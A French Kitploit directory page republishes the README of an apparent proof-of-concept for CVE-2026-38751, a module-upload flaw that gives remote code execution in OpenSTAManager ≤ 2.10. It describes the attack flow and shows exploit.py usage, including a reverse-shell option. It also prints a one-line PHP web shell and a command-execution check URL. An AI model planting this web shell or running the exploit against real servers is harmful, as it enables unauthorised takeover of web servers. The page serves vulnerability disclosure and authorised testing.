Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC — Ce dépôt contient une preuve de concept (PoC) pour CVE-2026-38751, affectant OpenSTAManager ≤ 2.10. La vulnérabilité permet à un attaquant authentifié de télécharger un module malveillant via la fonctionnalité de mise à jour de module, conduisant à un téléchargement de fichier arbitraire et à une exécution de code à distance (RCE). | Kitploit
Outils/GitHubGitHub/mkps/cve-2026-38751-openstamanager-arbitrary-file-upload-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubmkps/cve-2026-38751-openstamanager-arbitrary-file-upload-poc

CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC

Voir le dépôt
1il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Ce dépôt contient une preuve de concept (PoC) pour CVE-2026-38751, affectant OpenSTAManager ≤ 2.10. La vulnérabilité permet à un attaquant authentifié de télécharger un module malveillant via la fonctionnalité de mise à jour de module, conduisant à un téléchargement de fichier arbitraire et à une exécution de code à distance (RCE).

Partager

CVE-2026-38751 – Téléchargement arbitraire de fichier dans OpenSTAManager (PoC)

Ce dépôt contient un exploit de preuve de concept (PoC) pour CVE-2026-38751, affectant OpenSTAManager ≤ 2.10. La vulnérabilité permet à un attaquant authentifié de télécharger un module malveillant via la fonctionnalité de mise à jour des modules, entraînant un téléchargement arbitraire de fichier et une exécution de code à distance (RCE).

Référence CVE

  • Entrée CVE MITRE (premier enregistrement de divulgation) : https://www.cve.org/CVERecord?id=CVE-2026-38751
  • Base de données des vulnérabilités NVD (NIST) : https://nvd.nist.gov/vuln/detail/CVE-2026-38751
  • Base de données d'avis GitHub https://github.com/advisories/GHSA-rm34-fg4m-39mw

Logiciel concerné

  • OpenSTAManager ≤ 2.10
  • Système de mise à jour des modules (modules/aggiornamenti/upload_modules.php)

Description de la vulnérabilité

La fonctionnalité de mise à jour des modules permet aux utilisateurs authentifiés de télécharger des modules au format ZIP sans validation appropriée du contenu des fichiers ou des limites d'exécution. Un attaquant peut concevoir un module malveillant contenant des charges utiles PHP, qui sont ensuite déployées dans la racine web et exécutées via le contexte de l'application. Cela entraîne :

  • Téléchargement arbitraire de fichier (CWE-434)
  • Exécution de code à distance via les fichiers PHP téléchargés
  • Compromission totale du contexte de l'application

Flux d'attaque (haut niveau)

  1. S'authentifier sur OpenSTAManager
  2. Télécharger une archive ZIP de module conçue
  3. Déclencher le processus d'installation/mise à jour du module
  4. Accéder à la charge utile PHP téléchargée via la racine web
  5. Exécuter des commandes arbitraires sur le serveur

##Impact Une exploitation réussie permet :

  • Exécution de commandes à distance
  • Compromission du serveur web
  • Exfiltration de données
  • Prise de contrôle complète de l'application selon les privilèges

Prérequis

  • Compte utilisateur authentifié valide
  • Accès à la fonctionnalité de mise à jour des modules activée

Utilisation (PoC)

  1. Générer un module malveillant
root@kitploit:~
python exploit.py --build

Crée :

root@kitploit:~
update.zip
└── run/
    ├── MODULE
    └── evil.php
  1. Exécuter l'exploit
root@kitploit:~
python exploit.py <username> <password> <target_url>

Mode shell inversé optionnel :

root@kitploit:~
python exploit.py <username> <password> <target_url> --lhost <IP> --lport <PORT>

Exemple de charge utile

root@kitploit:~
<?php
isset($_GET['cmd']) && system($_GET['cmd']);
?>

Vérification

En cas de succès, le point d'accès suivant exécute des commandes système : /modules/run/evil.php?cmd=id

Références MITRE / NVD

  • Enregistrement CVE MITRE : https://www.cve.org/CVERecord?id=CVE-2026-38751
  • Entrée NVD : https://nvd.nist.gov/vuln/detail/CVE-2026-38751

Avertissement

Ce projet est destiné à :

  • Fins éducatives
  • Tests de sécurité autorisés
  • Environnements de recherche

Ne pas utiliser contre des systèmes sans autorisation explicite.

Notes

La détection peut varier en fonction de la configuration du serveur. Certains déploiements peuvent désactiver l'exécution directe de PHP dans les répertoires des modules. Le timing de l'activation du module peut nécessiter des tentatives.

Remerciements

  • Programme MITRE CVE
  • Base de données nationale des vulnérabilités NIST (NVD)
  • Mainteneurs du projet OpenSTAManager
  • https://github.com/fuutianyii/poc (Premier PoC)
Télécharger l’outil